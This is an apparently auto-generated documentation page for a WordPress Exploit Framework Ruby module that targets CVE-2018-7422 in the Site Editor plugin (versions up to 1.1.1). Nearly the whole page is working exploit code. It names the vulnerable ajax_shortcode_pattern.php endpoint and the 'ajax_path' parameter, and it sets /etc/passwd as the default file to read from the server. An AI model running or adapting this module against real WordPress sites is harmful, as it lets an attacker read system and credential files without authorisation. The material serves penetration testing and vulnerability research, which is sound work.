class Wpxf::Auxiliary::SiteEditorFileDownload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 6
def initialize
  super

  update_info(
    name: 'Site Editor <= 1.1.1 File Download',
    desc: %(
      This module exploits a vulnerability which allows you to
      download any non-PHP file accessible by the user the
      web server is running as.
    ),
    author: [
      'Nicolas Buzy-Debat', # Disclosure
      'rastating'           # WPXF module
    ],
    references: [
      ['CVE', '2018-7422'],
      ['WPVDB', '9044']
    ],
    date: 'Mar 16 2018'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 28
def check
  check_plugin_version_from_readme('site-editor', '1.1.2')
end
default_remote_file_path() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 32
def default_remote_file_path
  '/etc/passwd'
end
download_request_params() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 50
def download_request_params
  { 'ajax_path' => remote_file }
end
downloader_url() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 40
def downloader_url
  normalize_uri(wordpress_url_plugins, 'site-editor', 'editor', 'extensions', 'pagebuilder', 'includes', 'ajax_shortcode_pattern.php')
end
validate_content(content) click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 44
def validate_content(content)
  pattern = /{"success":true,"data":{"output":\[\]}}$/
  File.write(downloaded_filename, content.gsub(pattern, ''))
  super
end
working_directory() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 36
def working_directory
  'wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/'
end